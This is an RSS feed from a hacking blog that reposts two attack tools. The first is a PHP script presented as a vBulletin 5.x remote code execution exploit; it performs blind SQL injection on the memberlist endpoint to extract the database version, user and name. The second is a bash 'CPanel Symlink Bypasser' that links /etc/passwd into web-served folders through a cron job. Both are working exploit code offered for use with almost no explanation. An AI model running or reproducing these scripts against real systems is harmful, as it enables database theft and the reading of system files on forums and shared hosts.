<?xml version="1.0" encoding="UTF-8" standalone="no"?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><rss xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" version="2.0"><channel><title>[+] Wayc0de's Blog[+]</title><description></description><managingEditor>noreply@blogger.com (Anonymous)</managingEditor><pubDate>Wed, 8 Apr 2026 03:21:08 +0700</pubDate><generator>Blogger http://www.blogger.com</generator><openSearch:totalResults xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/">540</openSearch:totalResults><openSearch:startIndex xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/">1</openSearch:startIndex><openSearch:itemsPerPage xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/">25</openSearch:itemsPerPage><link>http://dzhenway.slackerc0de.us/</link><language>en-us</language><itunes:explicit>yes</itunes:explicit><copyright>by d'ZheNwaY</copyright><itunes:subtitle>d'ZheNwaY</itunes:subtitle><itunes:category text="Technology"><itunes:category text="Tech News"/></itunes:category><itunes:author>d'ZheNwaY</itunes:author><itunes:owner><itunes:email>noreply@blogger.com</itunes:email><itunes:name>d'ZheNwaY</itunes:name></itunes:owner><item><title>vBulletin 5.x Remote Code Execution Exploit</title><link>http://dzhenway.slackerc0de.us/2014/09/vbulletin-5x-remote-code-execution_19.html</link><category>Attack</category><category>Exploit</category><category>Hacking</category><category>Info</category><category>PHP</category><category>RCE</category><category>vBulletin</category><category>vulnerability</category><pubDate>Fri, 19 Sep 2014 14:40:00 +0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1090696245688506420.post-1267977499413433115</guid><description>&amp;lt;?php&lt;br /&gt;
&lt;br /&gt;
/*&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; Author: Nytro&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; Powered by: Romanian Security Team&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; Price: Free. Educational.&lt;br /&gt;
*/&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
error_reporting(E_ALL);&lt;br /&gt;
ini_set('display_errors', 1);&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
// Get arguments&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
$target_url = isset($argv[1]) ? $argv[1] : 'https://rstforums.com/v5';&lt;br /&gt;
$expression = str_replace('/', '\\/', $target_url);&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
// Function to send a POST request&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
function httpPost($url,$params)&lt;br /&gt;
{&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; $ch = curl_init($url);&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; curl_setopt($ch, CURLOPT_URL,$url);&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; curl_setopt($ch, CURLOPT_RETURNTRANSFER,true);&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; curl_setopt($ch, CURLOPT_HEADER, false);&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; curl_setopt($ch, CURLOPT_POST, 1);&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; curl_setopt($ch, CURLOPT_POSTFIELDS, $params);&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; curl_setopt($ch, CURLOPT_HTTPHEADER, array(&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 'Accept: application/json, text/javascript, */*; q=0.01',&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 'X-Requested-With: XMLHttpRequest',&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 'Referer: https://rstforums.com/v5/memberlist',&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 'Accept-Language: en-US,en;q=0.5',&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 'Cookie: bb_lastvisit=1400483408; bb_lastactivity=0;'&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ));&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; $output = curl_exec($ch);&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; if($output == FALSE) print htmlspecialchars(curl_error($ch));&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; curl_close($ch);&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; return $output;&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
// Function to get string between two other strings&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
function get_string_between($string, $start, $end)&lt;br /&gt;
{&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; $string = " ".$string;&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; $ini = strpos($string,$start);&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; if ($ini == 0) return "";&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; $ini += strlen($start);&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; $len = strpos($string,$end,$ini) - $ini;&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; return substr($string,$ini,$len);&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
// Get version&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
print "\r\nvBulletin 5.x Remote Code Execution Exploit\r\n\r\n";&lt;br /&gt;
print "Version: ";&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
$result = httpPost($target_url . '/ajax/render/memberlist_items', &lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 'criteria[perpage]=10&amp;amp;criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(),1&amp;nbsp; ,1)--+"+' . &lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; '&amp;amp;criteria[sortfield]=username&amp;amp;criteria[sortorder]=asc&amp;amp;securitytoken=guest');&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
$letter = 1;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
while(strpos($result, 'No Users Matched Your Query') == false)&lt;br /&gt;
{&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; $exploded = explode('&amp;lt;span class=\"h-left\"&amp;gt;\r\n\t\t\t\t\t\t\t\t\t&amp;lt;a href=\"' . $expression . '\/member\/', $result);&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; $username = get_string_between($exploded[1], '"&amp;gt;', '&amp;lt;\/a&amp;gt;');&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; print $username[0];&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; $letter++;&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; $result = httpPost($target_url . '/ajax/render/memberlist_items',&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 'criteria[perpage]=10&amp;amp;criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(&amp;nbsp; ),' . $letter . ',1)--+"+' .&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; '&amp;amp;criteria[sortfield]=username&amp;amp;criteria[sortorder]=asc&amp;amp;securitytoken=guest');&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
// Get user&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
print "\r\nUser: ";&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
$result = httpPost($target_url . '/ajax/render/memberlist_items',&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 'criteria[perpage]=10&amp;amp;criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),1&amp;nbsp; ,1)--+"+' .&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; '&amp;amp;criteria[sortfield]=username&amp;amp;criteria[sortorder]=asc&amp;amp;securitytoken=guest');&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
$letter = 1;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
while(strpos($result, 'No Users Matched Your Query') == false)&lt;br /&gt;
{&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; $exploded = explode('&amp;lt;span class=\"h-left\"&amp;gt;\r\n\t\t\t\t\t\t\t\t\t&amp;lt;a href=\"' . $expression . '\/member\/', $result);&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; $username = get_string_between($exploded[1], '"&amp;gt;', '&amp;lt;\/a&amp;gt;');&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; print $username[0];&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; $letter++;&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; $result = httpPost($target_url . '/ajax/render/memberlist_items',&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 'criteria[perpage]=10&amp;amp;criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),' . $letter . ',1)--+"+' .&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; '&amp;amp;criteria[sortfield]=username&amp;amp;criteria[sortorder]=asc&amp;amp;securitytoken=guest');&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
// Get database&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
print "\r\nDatabase: ";&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
$result = httpPost($target_url . '/ajax/render/memberlist_items',&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 'criteria[perpage]=10&amp;amp;criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(),&amp;nbsp; 1,1)--+"+' .&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; '&amp;amp;criteria[sortfield]=username&amp;amp;criteria[sortorder]=asc&amp;amp;securitytoken=guest');&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
$letter = 1;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
while(strpos($result, 'No Users Matched Your Query') == false)&lt;br /&gt;
{&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; $exploded = explode('&amp;lt;span class=\"h-left\"&amp;gt;\r\n\t\t\t\t\t\t\t\t\t&amp;lt;a href=\"' . $expression . '\/member\/', $result);&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; $username = get_string_between($exploded[1], '"&amp;gt;', '&amp;lt;\/a&amp;gt;');&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; print $username[0];&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; $letter++;&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; $result = httpPost($target_url . '/ajax/render/memberlist_items',&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 'criteria[perpage]=10&amp;amp;criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(),&amp;nbsp; ' . $letter . ',1)--+"+' .&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; '&amp;amp;criteria[sortfield]=username&amp;amp;criteria[sortorder]=asc&amp;amp;securitytoken=guest');&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
print "\r\n"&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
?&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="fullpost"&gt;&lt;a href="http://yogyacarder.link/"&gt;Sumber&lt;/a&gt;&amp;nbsp;&lt;/span&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total><author>noreply@blogger.com (d'ZheNwaY)</author></item><item><title>CPanel Symlink Bypasser</title><link>http://dzhenway.slackerc0de.us/2014/09/cpanel-symlink-bypasser.html</link><category>Attack</category><category>Bypass</category><category>Cpanel</category><category>Exploit</category><category>Hacking</category><category>Info</category><category>Security</category><category>Symlink</category><category>vulnerability</category><pubDate>Fri, 19 Sep 2014 14:11:00 +0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1090696245688506420.post-59416578343450647</guid><description>&lt;div&gt;
&lt;span class="c"&gt;#!/bin/bash&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="c"&gt;#    ______                       __   ____                                                ___&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="c"&gt;#   / ____/___  ____ _____  ___  / /  / __ )__  ______  ____ ______________  _____   _   _&amp;lt;  /&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="c"&gt;#  / /   / __ \/ __ `/ __ \/ _ \/ /  / __  / / / / __ \/ __ `/ ___/ ___/ _ \/ ___/  | | / / / &lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="c"&gt;# / /___/ /_/ / /_/ / / / /  __/ /  / /_/ / /_/ / /_/ / /_/ (__  |__  )  __/ /      | |/ / /  &lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="c"&gt;# \____/ .___/\__,_/_/ /_/\___/_/  /_____/\__, / .___/\__,_/____/____/\___/_/       |___/_/   &lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="c"&gt;#     /_/                                /____/_/                                             &lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="c"&gt;############################################&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="c"&gt;# CPanel Symlink Bypasser [Public Version] #&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="c"&gt;# By Hannibal Ksa (@r00t3rz) &amp;amp; R3m0t3 Nu11 #&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="c"&gt;#       alm3refh.com © Group XP 2014       #  &lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="c"&gt;############################################&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="c"&gt;#&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="c"&gt;# USAGE:&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="c"&gt;# 1. UPLOAD ME IN /home/user as Cpbypass.sh&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="c"&gt;# 2. GO TO CRON JOB&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="c"&gt;# 3. ADD THIS COMMAND:&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="c"&gt;# echo "Alm3refh bypass" ~| bash Cpbypass.sh -s "Alm3refh bypass" -- email@gmail.com&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="c"&gt;#&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="c"&gt;# email@gmail.com = your email&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="c"&gt;#&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="c"&gt;#&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="c"&gt;# THE FILE WILL SHOW YOU HOW TO SEE/DOWNLOAD YOUR SYMLINK!&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="c"&gt;# PS: ENJOY!&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="c"&gt;#&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="c"&gt;#&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="c"&gt;##########&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="c"&gt;#  FILE  #&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="c"&gt;##########&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="nv"&gt;SYM&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"/etc/passwd"&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;span class="c"&gt;########&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;""&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"    ______                       __   ____                                                ___"&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"   / ____/___  ____ _____  ___  / /  / __ \)__  ______  ____ ______________  _____   _   _&amp;lt;  /"&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"  / /   / __ \/ __ \`/ __ \/ _ \/ /  / __  / / / / __ \/ __ \`/ ___/ ___/ _ \/ ___/  | | / / / "&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;" / /___/ /_/ / /_/ / / / /  __/ /  / /_/ / /_/ / /_/ / /_/ (__  |__  )  __/ /      | |/ / /  "&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;" \____/ .___/\__,_/_/ /_/\___/_/  /_____/\__, / .___/\__,_/____/____/\___/_/       |___/_/   "&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"     /_/                                /____/_/                                             "&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"                       CPanel Symlink Bypasser [Public Version]"&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"                             By Hannibal Ksa &amp;amp; R3m0t3 Nu11"&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;""&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;""&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="c"&gt;########&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="nv"&gt;rand&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;bypass&lt;span class="k"&gt;$((&lt;/span&gt; &lt;span class="nv"&gt;$RANDOM&lt;/span&gt; &lt;span class="o"&gt;%&lt;/span&gt; &lt;span class="m"&gt;10&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="m"&gt;100&lt;/span&gt; &lt;span class="k"&gt;))&lt;/span&gt;;&lt;/div&gt;
&lt;div&gt;
&lt;span class="c"&gt;###&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="c"&gt;# 1st 3xpl017&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="c"&gt;###&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
ln -sf &lt;span class="nv"&gt;$SYM&lt;/span&gt; tmp/analog/&lt;span class="nv"&gt;$rand&lt;/span&gt;.html&lt;/div&gt;
&lt;div&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;""&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"1st Bypass:"&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;""&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"GO TO: https://yourbitch:2083/cpsession/tmp/user/analog/$rand.html"&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"yourbitch=the cpanel url"&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"cpsession=your cpanel session"&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"cpsession=cpanel user"&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;""&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="c"&gt;###&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="c"&gt;# 2nd 3xpl017&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="c"&gt;###&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
ln -sf &lt;span class="nv"&gt;$SYM&lt;/span&gt; tmp/webalizer/&lt;span class="nv"&gt;$rand&lt;/span&gt;.html&lt;/div&gt;
&lt;div&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;""&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"2nd Bypass:"&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;""&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"GO TO: https://yourbitch:2083/cpsession/tmp/user/webalizer/$rand.html"&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"yourbitch=the cpanel url"&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"cpsession=your cpanel session"&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"cpsession=cpanel user"&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;""&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="c"&gt;###&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="c"&gt;# 3rd 3xpl017&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="c"&gt;###&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
ln -sf &lt;span class="nv"&gt;$SYM&lt;/span&gt; tmp/webalizerftp/&lt;span class="nv"&gt;$rand&lt;/span&gt;.html&lt;/div&gt;
&lt;div&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;""&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"3rd Bypass:"&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;""&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"GO TO: https://yourbitch:2083/cpsession/tmp/user/webalizerftp/$rand.html"&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"yourbitch=the cpanel url"&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"cpsession=your cpanel session"&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"cpsession=cpanel user"&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;""&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="c"&gt;###&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="c"&gt;# 4th 3xpl017&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="c"&gt;###&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
ln -sf &lt;span class="nv"&gt;$SYM&lt;/span&gt; logs/&lt;span class="nv"&gt;$rand&lt;/span&gt;.doc&lt;/div&gt;
&lt;div&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;""&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"4th Bypass:"&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;""&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"GO TO: https://yourbitch:2083/cpsession/frontend/x3/raw/index.html"&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"yourbitch=the cpanel url"&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"cpsession=your cpanel session"&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;""&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"THEN SCROLL DOWN 'TIL YOU SEE bypass.doc AND DOWNLOAD IT!"&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;""&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="c"&gt;# DONE of the public version!&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="c"&gt;# E0F&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;span class="c"&gt;&lt;a href="http://madleets.com/"&gt;Sumber&lt;/a&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
